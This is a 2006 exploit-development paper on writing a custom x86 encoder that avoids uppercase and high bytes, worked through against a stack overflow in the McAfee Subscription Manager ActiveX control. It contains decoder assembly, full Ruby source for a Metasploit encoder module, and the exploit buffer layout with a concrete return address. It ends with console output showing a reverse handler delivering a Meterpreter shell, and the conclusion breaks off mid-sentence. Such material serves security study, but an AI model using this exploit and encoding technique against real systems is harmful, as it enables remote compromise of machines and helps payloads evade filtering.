mirror of https://github.com/fdiskyou/Zines.git
818 lines
36 KiB
Plaintext
818 lines
36 KiB
Plaintext
Implementing a Custom X86 Encoder
|
|
Aug, 2006
|
|
skape
|
|
mmiller@hick.org
|
|
|
|
|
|
1) Foreword
|
|
|
|
Abstract: This paper describes the process of implementing a custom
|
|
encoder for the x86 architecture. To help set the stage, the McAfee
|
|
Subscription Manager ActiveX control vulnerability, which was discovered
|
|
by eEye, will be used as an example of a vulnerability that requires the
|
|
implementation of a custom encoder. In particular, this vulnerability
|
|
does not permit the use of uppercase characters. To help make things
|
|
more interesting, the encoder described in this paper will also avoid
|
|
all characters above 0x7f. This will make the encoder both UTF-8 safe
|
|
and tolower safe.
|
|
|
|
Challenge: The author believes that a UTF-8 safe and tolower safe
|
|
encoder could most likely be implemented in a much more optimized
|
|
fashion that incurs far less overhead in terms of size. If any reader
|
|
has ideas about ways in which this might be approached, feel free to
|
|
contact the author. A bonus challenge would be to identify a geteip
|
|
technique that can be used with these character limitations.
|
|
|
|
|
|
2) Introduction
|
|
|
|
In the month of August, eEye released an advisory for a stack-based
|
|
buffer overflow that was found in the McAfee Subscription Manager
|
|
ActiveX control. The underlying vulnerability was in an insecure call
|
|
to vsprintf that was exposed through scripting-accessible routines. At a
|
|
glance, this vulnerability would appear trivial to exploit given that
|
|
it's a very basic stack overflow. However, once it comes to
|
|
transmitting a payload, or even a particular return address, certain
|
|
limiting factors begin to appear. The focus of this paper will center
|
|
around an exercise in implementing a custom encoder to overcome certain
|
|
character set limitations. The McAfee Subscription Manager vulnerability
|
|
will be used as a real-world example of a vulnerability that requires a
|
|
custom encoder to exploit.
|
|
|
|
When it comes to exploiting this vulnerability, the first step is to
|
|
reproduce the conditions reported in the advisory. Like most
|
|
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
|
|
such as A's. However, in this particular exploit, sending a sequence of
|
|
A's, which equates to 0x41, actually causes the return address to be
|
|
overwritten with 0x61's which are lowercase a's. Judging from this, it
|
|
seems obvious that the input string is undergoing a tolower operation
|
|
and it will not be possible for the payload or return address to contain
|
|
any uppercase characters.
|
|
|
|
Given these character restrictions, it's safe to go forward with writing
|
|
the exploit. To simply get a proof of concept for code execution, it
|
|
makes sense to put a series of int3's, represented by the 0xcc opcode,
|
|
immediately following the return address. The return address could then
|
|
be pointed to the location of a push esp / ret or some other type of
|
|
instruction that transfers control to where the series of int3's should
|
|
reside. Once the vulnerability is triggered, the debugger should break
|
|
in at an int3 instruction, but that's not actually what happens.
|
|
Instead, it breaks in on a completely different instruction:
|
|
|
|
|
|
(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
|
|
eax=00000f19 ebx=00000000 ecx=00139438
|
|
edx=0013a384 esi=00001b58 edi=0013a080
|
|
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
|
|
0013a02c ec in al,dx
|
|
0:000> u eip
|
|
0013a02c ec in al,dx
|
|
0013a02d ec in al,dx
|
|
0013a02e ec in al,dx
|
|
0013a02f ec in al,dx
|
|
|
|
|
|
Again, it looks like the buffer is undergoing some sort of transformation. One
|
|
quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
|
|
would happen when changing an uppercase character to a lowercase character,
|
|
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It
|
|
appears that the operation that's performing the case lowering may also be
|
|
inadvertently performing it on a specific high ASCII range.
|
|
|
|
What's actually occurring is that the subscription manager control is calling
|
|
mbslwr, using the statically linked CRT, on a copy of the original input
|
|
string. Internally, mbslwr calls into crtLCMapStringA. Eventually this will
|
|
lead to a call out to kernel32!LCMapStringW. The second parameter to this
|
|
routine is dwMapFlags which describes what sort of transformations, if any,
|
|
should be performed on the buffer. The mbslwr routine passes 0x100, or
|
|
LCMAP_LOWERCASE. This is what results in the lowering of the string.
|
|
|
|
So, given this information, it can be determined that it will not be possible
|
|
to use characters through and including 0x41 and 0x5A as well as, for the sake
|
|
of clarity, 0xc0 and 0xe0. In actuality, not all of the characters in this
|
|
range are bad. The main reason this ends up causing problems is because many
|
|
of the payload encoders out there for x86, including those in Metasploit, rely
|
|
on characters from these two sets for their decoder stub and subsequent encoded
|
|
data. For that reason, and for the challenge, it's worth pursuing the
|
|
implementation of a custom encoder.
|
|
|
|
While this particular vulnerability will permit the use of many characters
|
|
above 0x80, it makes the challenge that much more interesting, and particulary
|
|
useful, to limit the usable character set to the characters described below.
|
|
The reason this range is more useful is because the characters are UTF-8 safe
|
|
and also tolower safe. Like most good payloads, the encoder will also avoid
|
|
NULL bytes.
|
|
|
|
|
|
0x01 -> 0x40
|
|
0x5B -> 0x7f
|
|
|
|
|
|
As with all encoded formats, there are actually two major pieces involved. The
|
|
first part is the encoder itself. The encoder is responsible for taking a raw
|
|
buffer and encoding it into the appropriate format. The second part is the
|
|
decoder, which, as is probably obvious, takes the encoded form and converts it
|
|
back into the raw form so that it can be executed as a payload. The
|
|
implementation of these two pieces will be described in the following chapters.
|
|
|
|
|
|
3) Implementing the Decoder
|
|
|
|
The implementation of the decoder involves taking the encoded form and
|
|
converting it back into the raw form. This must all be done using assembly
|
|
instructions that will execute natively on the target machine after an exploit
|
|
has succeeded and it must also use only those instructions that fall within the
|
|
valid character set. To accomplish this, it makes sense to figure out what
|
|
instructions are available out of the valid character set. To do that, it's as
|
|
simple as generating all of the permutations of the valid characters in both
|
|
the first and second byte positions. This provides a pretty good idea of what's
|
|
available. The end-result of such a process is a list of about 105 unique
|
|
instructions (independent of operand types). Of those instructions the most
|
|
interesting are listed below:
|
|
|
|
|
|
add
|
|
sub
|
|
imul
|
|
inc
|
|
cmp
|
|
jcc
|
|
pusha
|
|
push
|
|
pop
|
|
and
|
|
or
|
|
xor
|
|
|
|
|
|
Some very useful instructions are available, such as add, xor, push, pop, and a
|
|
few jcc's. While there's an obvious lack of the traditional mov instruction,
|
|
it can be made up for through a series of push and pop instructions, if needed.
|
|
With the set of valid instructions identified, it's possible to begin
|
|
implementing the decoder. Most decoders will involve three implementation
|
|
phases. The first phase is used to determine the base address of the decoder
|
|
stub using a geteip technique. Following that, the encoded data must be
|
|
transformed from its character-safe form to the form that it will actually
|
|
execute from. Finally, the decoder must transfer control into the decoded data
|
|
so that the actual payload can begin executing. These three steps will be
|
|
described in the following sections.
|
|
|
|
In order to better understand the following sections, it's important to
|
|
describe the general approach that is going to be taken to implement the
|
|
decoder. The stub header is used to prepare the necessary state for the decode
|
|
transforms. The transforms themselves take the encoded data, as a series of
|
|
four byte blocks, and translate it using the process described in section .
|
|
Finally, execution falls through to the decoded data that is stored in place of
|
|
the encoded data.
|
|
|
|
|
|
3.1) Determining the Stub's Base Address
|
|
|
|
|
|
The first step in most decoder stubs will require the use of a series of
|
|
instructions, also referred to as geteip code, that obtain the location of the
|
|
current instruction pointer. The reason this is necessary is because most
|
|
decoders will have the encoded data placed immediately following the decoder
|
|
stub in memory. In order to operate on the encoded data using an absolute
|
|
address, it is necessary to determine where the data is at. If the decoder
|
|
stub can determine the address that it's executing from, then it can determine
|
|
the address of the encoded data immediately following it in memory in a
|
|
position-independent fashion. As one might expect, the character limitations of
|
|
this challenge make it quite a bit harder to get the value current instruction
|
|
pointer.
|
|
|
|
There are a number of different techniques that can be used to get the value of
|
|
the instruction pointer on x86. However, the majority of these techniques rely
|
|
on the use of the call instruction. The problem with the use of the call
|
|
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
|
|
or 0xff. Another technique that can be used to get the instruction pointer is
|
|
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
|
|
of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
|
|
structured exception handling to get the instruction pointer. This is
|
|
accomplished by registering an exception handler and extracting the Eip value
|
|
from the CONTEXT structure when an exception is generated. In fact, this
|
|
approach has even been implemented in entirely alphanumeric form for Windows by
|
|
SkyLined. Unfortunately, it can't be used in this case because it relies on
|
|
uppercase characters.
|
|
|
|
With all of the known geteip techniques unusable, it seems like some
|
|
alternative method for getting the base address of the decoder stub will be
|
|
needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
|
|
is common for the decoder stub to assume that a certain register contains the
|
|
base address of the decoder stub. This assumption makes the decoder more
|
|
complicated to use because it can't simply be dropped into any exploit and be
|
|
expected to work. Instead, exploits may need to be modified in order to ensure
|
|
that a register can be found that contains the location, or some location near,
|
|
the decoder stub.
|
|
|
|
At the time of this writing, the author is not aware of a geteip technique that
|
|
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
|
|
payloads, the decoder described in this paper will be implemented using a
|
|
register that is explicitly assumed to contain a reference to some address that
|
|
is near the base address of the decoder stub. For this document, the register
|
|
that is assumed to hold the address will be ecx, but it is equally possible to
|
|
use other registers.
|
|
|
|
For this particular decoder, determining the base address is just the first
|
|
step involved in implementing the stub's header. Once the base address has
|
|
been determined, the decoder must adjust the register that holds the base
|
|
address to point to the location of the encoded data. The reason this is
|
|
necessary is because the next step of the decoder, the transforms, depend on
|
|
knowing the location of the encoded data that they will be operating on. In
|
|
order to calculate this address, the decoder must add the size of the stub
|
|
header plus the size of the all of the decode transforms to the register that
|
|
holds the base address. The end result should be that the register will hold
|
|
the address of the first encoded block.
|
|
|
|
The following disassembly shows one way that the stub header might be
|
|
implemented. In this disassembly, ecx is assumed to point at the beginning of
|
|
the stub header:
|
|
|
|
|
|
00000000 6A12 push byte +0x12
|
|
00000002 6B3C240B imul edi,[esp],byte +0xb
|
|
00000006 60 pusha
|
|
00000007 030C24 add ecx,[esp]
|
|
0000000A 6A19 push byte +0x19
|
|
0000000C 030C24 add ecx,[esp]
|
|
0000000F 6A04 push byte +0x4
|
|
|
|
|
|
The purpose of the first two instructions is to calculate the number of bytes
|
|
consumed by all of the decode transforms (which are described in section ). It
|
|
accomplishes this by multiplying the size of each transform, which is 0xb
|
|
bytes, by the total number of transforms, which in this example 0x12. The
|
|
result of the multiplication, 0xc6, is stored in edi. Since each transform is
|
|
capable of decoding four bytes of the raw payload, the maximum number of bytes
|
|
that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting
|
|
factor, though, as other combinations of imul can be used to account for larger
|
|
payloads.
|
|
|
|
Once the size of the decode transforms has been calculated, pusha is executed
|
|
in order to place the edi register at the top of the stack. With the value of
|
|
edi at the top of the stack, the value can be added to the base address
|
|
register ecx, thus accounting for the number of bytes used by the decode
|
|
transforms. The astute reader might ask why the value of edi is indirectly
|
|
added to ecx. Why not just add it directly? The answer, of course, is due to
|
|
bad characters:
|
|
|
|
|
|
00000000 01F9 add ecx,edi
|
|
|
|
|
|
It's also not possible to simply push edi onto the stack, because the push edi
|
|
instruction also contains bad characters:
|
|
|
|
|
|
00000000 57 push edi
|
|
|
|
|
|
Starting with the fifth instruction, the size of the stub header, plus any
|
|
other offsets that may need to be accounted for, are added to the base address
|
|
in order to shift the ecx register to point at the start of the encoded data.
|
|
This is accomplished by simply pushing the the number of bytes to add onto the
|
|
stack and then adding them to the ecx register indirectly by adding through
|
|
[esp].
|
|
|
|
After these instructions are finished, ecx will point to the start of the
|
|
encoded data. The final instruction in the stub header is a push byte 0x4. This
|
|
instruction isn't actually used by the stub header, but it's there to set up
|
|
some necessary state that will be used by the decode transforms. It's use will
|
|
be described in the next section.
|
|
|
|
|
|
3.2) Transforming the Encoded Data
|
|
|
|
The most important part of any decoder is the way in which it transforms the
|
|
data from its encoded form to its actual form. For example, many of the
|
|
decoders used in the Metasploit Framework and elsewhere will xor a portion of
|
|
the encoded data with a key that results in the actual bytes of the original
|
|
payload being produced. While this an effective way of obtaining the desired
|
|
results, it's not possible to use such a technique with the character set
|
|
limitations currently defined in this paper.
|
|
|
|
In order to transform encoded data back to its original form, it must be
|
|
possible to produce any byte from 0x00 to 0xff using any number of combinations
|
|
of bytes that fall within the valid character set. This means that this
|
|
decoder will be limited to using combinations of character that fall within
|
|
0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
|
|
accomplishing the transformation, it makes sense to investigate each of the
|
|
useful instructions that were identified earlier in this chapter.
|
|
|
|
The bitwise instructions, such as and, or, and xor are not going to be
|
|
particularly useful to this decoder. The main reason for this is that they are
|
|
unable to produce values that reside outside of the valid character sets
|
|
without the aide of a bit shifting instruction. For example, it is impossible
|
|
to bitwise-and two non-zero values in the valid character set together to
|
|
produce 0x00. While xor could be used to accomplish this, that's about all that
|
|
it could do other than producing other values below the 0x80 boundary. These
|
|
restrictions make the bitwise instructions unusable.
|
|
|
|
The imul instruction could be useful in that it is possible to multiply two
|
|
characters from the valid character set together to produce values that reside
|
|
outside of the valid character set. For example, multiplying 0x02 by 0x7f
|
|
produces 0xfe. While this may have its uses, there are two remaining
|
|
instructions that are actually the most useful.
|
|
|
|
The add instruction can be used to produce almost all possible characters.
|
|
However, it's unable to produce a few specific values. For example, it's
|
|
impossible to add two valid characters together to produce 0x00. It is also
|
|
impossible to add two valid characters together to produce 0xff and 0x01.
|
|
While this limitation may make it appear that the add instruction is unusable,
|
|
its saving grace is the sub instruction.
|
|
|
|
Like the add instruction, the sub instruction is capable of producing almost
|
|
all possible characters. It is certainly capable of producing the values that
|
|
add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
|
|
It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
|
|
produce by subtracting 0x02 from 0x03. However, like the add instruction,
|
|
there are also characters that the sub instruction cannot produce. These
|
|
characters include 0x7f, 0x80, and 0x81.
|
|
|
|
Given this analysis, it seems that using add and sub in combination is most
|
|
likely going to be the best choice when it comes to transforming encoded data
|
|
for this decoder. With the fundamental operations selected, the next step is
|
|
to attempt to implement the code that actually performs the transformation. In
|
|
most decoders, the transform will be accomplished through a loop that simply
|
|
performs the same operation on a pointer that is incremented by a set number of
|
|
bytes each iteration. This type of approach results in all of the encoded data
|
|
being decoded prior to executing it. Using this type of technique is a little
|
|
bit more complicated for this decoder, though, because it can't simply rely on
|
|
the use of a static key and it's also limited in terms of what instructions it
|
|
can use within the loop.
|
|
|
|
For these reasons, the author decided to go with an alternative technique for
|
|
the transformation portion of the decoder stub. Rather than using a loop that
|
|
iterates over the encoded data, the author chose to use a series of sequential
|
|
transformations where each block of the encoded data was decoded. This
|
|
technique has been used before in similar situations. One negative aspect of
|
|
using this approach over a loop-based approach is that it substantially
|
|
increases the size of the encoded payload. While figure gives an idea of the
|
|
structure of the decoder, it doesn't give a concrete understanding of how it's
|
|
actually implemented. It's at this point that one must descend from the lofty
|
|
high-level. What better way to do this than diving right into the disassembly?
|
|
|
|
|
|
00000011 6830703C14 push dword 0x143c7030
|
|
00000016 5F pop edi
|
|
00000017 0139 add [ecx],edi
|
|
00000019 030C24 add ecx,[esp]
|
|
|
|
|
|
The form of each transform will look exactly like this one. What's actually
|
|
occurring is a four byte value is pushed onto the stack and then popped into
|
|
the edi register. This is done in place of a mov instruction because the mov
|
|
instruction contains invalid characters. Once the value is in the edi
|
|
register, it is either added to or subtracted from its respective encoded data
|
|
block. The result of the add or subtract is stored in place of the previously
|
|
encoded data. Once the transform has completed, it adds the value at the top
|
|
of the stack, which was set to 0x4 in the decoder stub header, to the register
|
|
that holds the pointer into the encoded data. This results in the pointer
|
|
moving on to the next encoded data block so that the subsequent transform will
|
|
operate on the correct block.
|
|
|
|
This simple process is all that's necessary to perform the transformations
|
|
using only valid characters. As mentioned above, one of the negative aspects
|
|
of this approach is that it does add quite a bit of overhead to the original
|
|
payload. For each four byte block, 11 bytes of overhead are added. The
|
|
approach is also limited by the fact that if there is ever a portion of the raw
|
|
payload that contains characters that add cannot handle, such as 0x00, and also
|
|
contains characters that sub cannot handle, such as 0x80, then it will not be
|
|
possible to encode it.
|
|
|
|
|
|
3.3) Transferring Control to the Decoded Data
|
|
|
|
Due to the way the decoder is structured, there is no need for it to include
|
|
code that directly transfers control to the decoded data. Since this decoder
|
|
does not use any sort of looping, execution control will simply fall through to
|
|
the decoded data after all of the transformations have completed.
|
|
|
|
|
|
4) Implementing the Encoder
|
|
|
|
The encoder portion is made up of code that runs on an attacker's machine prior
|
|
to exploiting a target. It converts the actual payload that will be executed
|
|
into the encoded format and then transmits the encoded form as the payload.
|
|
Once the target begins executing code, the decoder, as described in chapter ,
|
|
converts the encoded payload back into its raw form and then executes it.
|
|
|
|
For the purposes of this document, the client-side encoder was implemented in
|
|
the 3.0 version of the Metasploit Framework as an encoder module for x86. This
|
|
chapter will describe what was actually involved in implementing the encoder
|
|
module for the Metasploit Framework.
|
|
|
|
The very first step involved in implementing the encoder is to create the
|
|
appropriate file and set up the class so that it can be loaded into the
|
|
framework. This is accomplished by placing the encoder module's file in the
|
|
appropriate directory, which in this case is modules/encoders/x86. The name of
|
|
the module's file is important only in that the module's reference name is
|
|
derived from the filename. For example, this encoder can be referenced as
|
|
x86/avoidutf8tolower based on its filename. In this case, the module's
|
|
filename is avoidutf8tolower.rb. Once the file is created in the appropriate
|
|
location, the next step is to define the class and provide the framework with
|
|
the appropriate module information.
|
|
|
|
To define the class, it must be placed in the appropriate namespace that
|
|
reflects where it is at on the filesystem. In this case, the module is placed
|
|
in the Msf::Encoders::X86 namespace. The name of the class itself is not
|
|
important so long as it is unique within the namespace. When defining the
|
|
class, it is important that it inherit from the Msf::Encoder base class at some
|
|
level. This ensures that it implements all the required methods for an encoder
|
|
to function when the framework is interacting with it.
|
|
|
|
At this point, the class definition should look something like this:
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
module Msf
|
|
module Encoders
|
|
module X86
|
|
|
|
class AvoidUtf8 < Msf::Encoder
|
|
|
|
end
|
|
|
|
end
|
|
end
|
|
end
|
|
|
|
|
|
With the class defined, the next step is to create a constructor and to pass
|
|
the appropriate module information down to the base class in the form of the
|
|
info hash. This hash contains information about the module, such as name,
|
|
version, authorship, and so on. For encoder modules, it also conveys
|
|
information about the type of encoder that's being implemented as well as
|
|
information specific to the encoder, like block size and key size. For this
|
|
module, the constructor might look something like this:
|
|
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Avoid UTF8/tolower',
|
|
'Version' => '$Revision: 1.3 $',
|
|
'Description' => 'UTF8 Safe, tolower Safe Encoder',
|
|
'Author' => 'skape',
|
|
'Arch' => ARCH_X86,
|
|
'License' => MSF_LICENSE,
|
|
'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
|
|
'Decoder' =>
|
|
{
|
|
'KeySize' => 4,
|
|
'BlockSize' => 4,
|
|
})
|
|
end
|
|
|
|
|
|
With all of the boilerplate code out of the way, it's time to finally get into
|
|
implementing the actual encoder. When implementing encoder modules in the 3.0
|
|
version of the Metasploit Framework, there are a few key methods that can
|
|
overridden by a derived class. These methods are described in detail in the
|
|
developer's guide, so an abbreviated explanation of only those useful to this
|
|
encoder will be given here. Each method will be explained in its own
|
|
individual section.
|
|
|
|
4.1) decoder_stub
|
|
|
|
First and foremost, the decoderstub method gives an encoder module the
|
|
opportunity to dynamically generate a decoder stub. The framework's idea of
|
|
the decoder stub is equivalent to the stub header described in chapter . In
|
|
this case, it must simply provide a buffer whose assembly will set up a
|
|
specific register to point to the start of the encoded data blocks as described
|
|
in section . The completed version of this method might look something like
|
|
this:
|
|
|
|
|
|
def decoder_stub(state)
|
|
len = ((state.buf.length + 3) & (~0x3)) / 4
|
|
|
|
off = (datastore['BufferOffset'] || 0).to_i
|
|
|
|
decoder =
|
|
"\x6a" + [len].pack('C') + # push len
|
|
"\x6b\x3c\x24\x0b" + # imul 0xb
|
|
"\x60" + # pusha
|
|
"\x03\x0c\x24" + # add ecx, [esp]
|
|
"\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
|
|
"\x03\x0c\x24" + # add ecx, [esp]
|
|
"\x6a\x04" # push byte 0x4
|
|
|
|
state.context = ''
|
|
|
|
return decoder
|
|
end
|
|
|
|
|
|
In this routine, the length of the raw buffer, as found through
|
|
state.buf.length, is aligned up to a four byte boundary and then divided by
|
|
four. Following that, an optional buffer offset is stored in the off local
|
|
variable. The purpose of the BufferOffset optional value is to allow exploits
|
|
to cause the encoder to account for extra size overhead in the ecx register
|
|
when doing its calculations. The decoder stub is then generated using the
|
|
calculated length and offset to produce the stub header. The stub header is
|
|
then returned to the caller.
|
|
|
|
|
|
4.2) encode_block
|
|
|
|
The next important method to override is the encode_block method. This method
|
|
is used by the framework to allow an encoder to encode a single block and
|
|
return the resultant encoded buffer. The size of each block is provided to the
|
|
framework through the encoder's information hash. For this particular encoder,
|
|
the block size is four bytes. The implementation of the encode_block routine is
|
|
as simple as trying to encode the block using either the add instruction or the
|
|
sub instruction. Which instruction is used will depend on the bytes in the
|
|
block that is being encoded.
|
|
|
|
|
|
def encode_block(state, block)
|
|
buf = try_add(state, block)
|
|
|
|
if (buf.nil?)
|
|
buf = try_sub(state, block)
|
|
end
|
|
|
|
if (buf.nil?)
|
|
raise BadcharError.new(state.encoded, 0, 0, 0)
|
|
end
|
|
|
|
buf
|
|
end
|
|
|
|
|
|
The first thing encode_block tries is add. The try_add method is implemented as
|
|
shown below:
|
|
|
|
|
|
def try_add(state, block)
|
|
buf = "\x68"
|
|
vbuf = ''
|
|
ctx = ''
|
|
|
|
block.each_byte { |b|
|
|
return nil if (b == 0xff or b == 0x01 or b == 0x00)
|
|
|
|
begin
|
|
xv = rand(b - 1) + 1
|
|
end while (is_badchar(state, xv) or is_badchar(state, b - xv))
|
|
|
|
vbuf += [xv].pack('C')
|
|
ctx += [b - xv].pack('C')
|
|
}
|
|
|
|
buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"
|
|
|
|
state.context += ctx
|
|
|
|
return buf
|
|
end
|
|
|
|
|
|
The try_add routine enumerates each byte in the block, trying to find a random
|
|
byte that, when added to another random byte, produces the byte value in the
|
|
block. The algorithm it uses to accomplish this is to loop selecting a random
|
|
value between 1 and the actual value. From there a check is made to ensure
|
|
that both values are within the valid character set. If they are both valid,
|
|
then one of the values is stored as one of the bytes of the 32-bit immediate
|
|
operand to the push instruction that is part of the decode transform for the
|
|
current block. The second value is appended to the encoded block context.
|
|
After all bytes have been considered, the instructions that compose the decode
|
|
transform are completed and the encoded block context is appended to the string
|
|
of encoded blocks. Finally, the decode transform is returned to the framework.
|
|
|
|
In the event that any of the bytes that compose the block being encoded by
|
|
try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this
|
|
happens, the encode_block routine will attempt to encode the block using the sub
|
|
instruction. The implementation of the try_sub routine is shown below:
|
|
|
|
|
|
def try_sub(state, block)
|
|
buf = "\x68";
|
|
vbuf = ''
|
|
ctx = ''
|
|
carry = 0
|
|
|
|
block.each_byte { |b|
|
|
return nil if (b == 0x80 or b == 0x81 or b == 0x7f)
|
|
|
|
x = 0
|
|
y = 0
|
|
prev_carry = carry
|
|
|
|
begin
|
|
carry = prev_carry
|
|
|
|
if (b > 0x80)
|
|
diff = 0x100 - b
|
|
y = rand(0x80 - diff - 1).to_i + 1
|
|
x = (0x100 - (b - y + carry))
|
|
carry = 1
|
|
else
|
|
diff = 0x7f - b
|
|
x = rand(diff - 1) + 1
|
|
y = (b + x + carry) & 0xff
|
|
carry = 0
|
|
end
|
|
|
|
end while (is_badchar(state, x) or is_badchar(state, y))
|
|
|
|
vbuf += [x].pack('C')
|
|
ctx += [y].pack('C')
|
|
}
|
|
|
|
buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"
|
|
|
|
state.context += ctx
|
|
|
|
return buf
|
|
end
|
|
|
|
|
|
Unlike the try_add routine, the try_sub routine is a little bit more
|
|
complicated, perhaps unnecessarily. The main reason for this is that
|
|
subtracting two 32-bit values has to take into account things like carrying
|
|
from one digit to another. The basic idea is the same. Each byte in the block
|
|
is enumerated. If the byte is above 0x80, the routine calculates the
|
|
difference between 0x100 and the byte. From there, it calculates the y value
|
|
as a random number between 1 and 0x80 minus the difference. Using the y value,
|
|
it generates the x value as 0x100 minus the byte value minus y plus the current
|
|
carry flag. To better understand this, consider the following scenario.
|
|
|
|
Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
|
|
is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
|
|
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
|
|
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.
|
|
|
|
However, if the byte value is less than 0x80, then a different method is used
|
|
to select the x and y values. In this case, the difference is calculated as
|
|
0x7f minus the value of the current byte. The value of x is then assigned a
|
|
random value between 1 and the difference. The value of y is then calculated
|
|
as the current byte plus x plus the carry flag. For example, if the value is
|
|
0x24, then the values could be calculated as described in the following
|
|
scenario.
|
|
|
|
First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
|
|
0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be
|
|
calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.
|
|
|
|
Given these two methods of calculating the individual byte values, it's
|
|
possible to encode all byte with the exception of 0x7f, 0x80, and 0x81. If any
|
|
one of these three bytes is encountered, the try_sub routine will return nil
|
|
and the encoding will fail. Otherwise, the routine will complete in a fashion
|
|
similar to the try_add routine. However, rather than using an add instruction,
|
|
it uses the sub instruction.
|
|
|
|
4.3) encode_end
|
|
|
|
|
|
With all the encoding cruft out of the way, the final method that needs to be
|
|
overridden is encode_end. In this method, the state.context attribute is
|
|
appended to the state.encoded. The purpose of the state.context attribute is
|
|
to hold all of the encoded data blocks that are created over the course of
|
|
encoding each block. The state.encoded attribute is the actual decoder
|
|
including the stub header, the decode transformations, and finally, the encoded
|
|
data blocks.
|
|
|
|
|
|
def encode_end(state)
|
|
state.encoded += state.context
|
|
end
|
|
|
|
|
|
Once encoding completes, the result might be a disassembly that looks something
|
|
like this:
|
|
|
|
|
|
$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
|
|
./msfencode -e x86/avoid_utf8_tolower -t raw | \
|
|
ndisasm -u -
|
|
[*] x86/avoid_utf8_tolower succeeded, final size 47
|
|
|
|
00000000 6A02 push byte +0x2
|
|
00000002 6B3C240B imul edi,[esp],byte +0xb
|
|
00000006 60 pusha
|
|
00000007 030C24 add ecx,[esp]
|
|
0000000A 6A11 push byte +0x11
|
|
0000000C 030C24 add ecx,[esp]
|
|
0000000F 6A04 push byte +0x4
|
|
00000011 683C0C190D push dword 0xd190c3c
|
|
00000016 5F pop edi
|
|
00000017 0139 add [ecx],edi
|
|
00000019 030C24 add ecx,[esp]
|
|
0000001C 68696A6060 push dword 0x60606a69
|
|
00000021 5F pop edi
|
|
00000022 0139 add [ecx],edi
|
|
00000024 030C24 add ecx,[esp]
|
|
00000027 06 push es
|
|
00000028 1467 adc al,0x67
|
|
0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c
|
|
0000002E 6C insb
|
|
|
|
|
|
5) Applying the Encoder
|
|
|
|
The whole reason that this encoder was originally needed was to take advantage
|
|
of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
|
|
that the encoder has been implemented, all that's left is to try it out and see
|
|
if it works. To test this against a Windows XP SP0 target, the overflow buffer
|
|
might be constructed as follows.
|
|
|
|
First, a string of 2972 random text characters must be generated. The return
|
|
address should follow the random character string. An example of a valid
|
|
return address for this target is 0x7605122f which is the location of a jmp esp
|
|
instruction in shell32.dll. Immediately following the return address in the
|
|
overflow buffer should be a series of five instructions:
|
|
|
|
|
|
00000000 60 pusha
|
|
00000001 6A01 push byte +0x1
|
|
00000003 6A01 push byte +0x1
|
|
00000005 6A01 push byte +0x1
|
|
00000007 61 popa
|
|
|
|
|
|
The purpose of this series of instructions is to cause the value of esp at the
|
|
time that the pusha occurs to be popped into the ecx register. As the reader
|
|
should recall, the ecx register is used as the base address for the decoder
|
|
stub. However, since esp doesn't actually point to the base address of the
|
|
decoder stub, the encoder must be informed that 8 extra bytes must be added to
|
|
ecx when accounting for the extra offset into the encoded data blocks. This is
|
|
conveyed by setting the BufferOffset value to 8. After these five instructions
|
|
should come the encoded version of the payload. To better visualize this,
|
|
consider the following snippet from the exploit:
|
|
|
|
|
|
buf =
|
|
Rex::Text.rand_text(2972, payload_badchars) +
|
|
[ ret ].pack('V') +
|
|
"\x60" + # pusha
|
|
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
|
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
|
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
|
"\x61" + # popa
|
|
p.encoded
|
|
|
|
|
|
With the overflow buffer ready to go, the only thing left to do is fire off the
|
|
an exploit attempt by having the machine browse to the malicious website:
|
|
|
|
|
|
msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
|
|
[*] Started reverse handler
|
|
[*] Using URL: http://x.x.x.3:8080/foo
|
|
[*] Server started.
|
|
[*] Exploit running as background job.
|
|
msf exploit(mcafee_mcsubmgr_vsprintf) >
|
|
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
|
|
[*] Sending stage (2834 bytes)
|
|
[*] Sleeping before handling stage...
|
|
[*] Uploading DLL (73739 bytes)...
|
|
[*] Upload completed.
|
|
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)
|
|
|
|
msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
|
|
[*] Starting interaction with 1...
|
|
|
|
meterpreter >
|
|
|
|
|
|
6) Conclusion
|
|
|
|
The purpose of this paper was to illustrate the process of implementing a
|
|
customer encoder for the x86 architecture. In particular, the encoder
|
|
described in this paper was designed to make it possible to encode payloads in
|
|
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
|
|
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
|
|
control was used because of its restrictions on uppercase characters. While
|
|
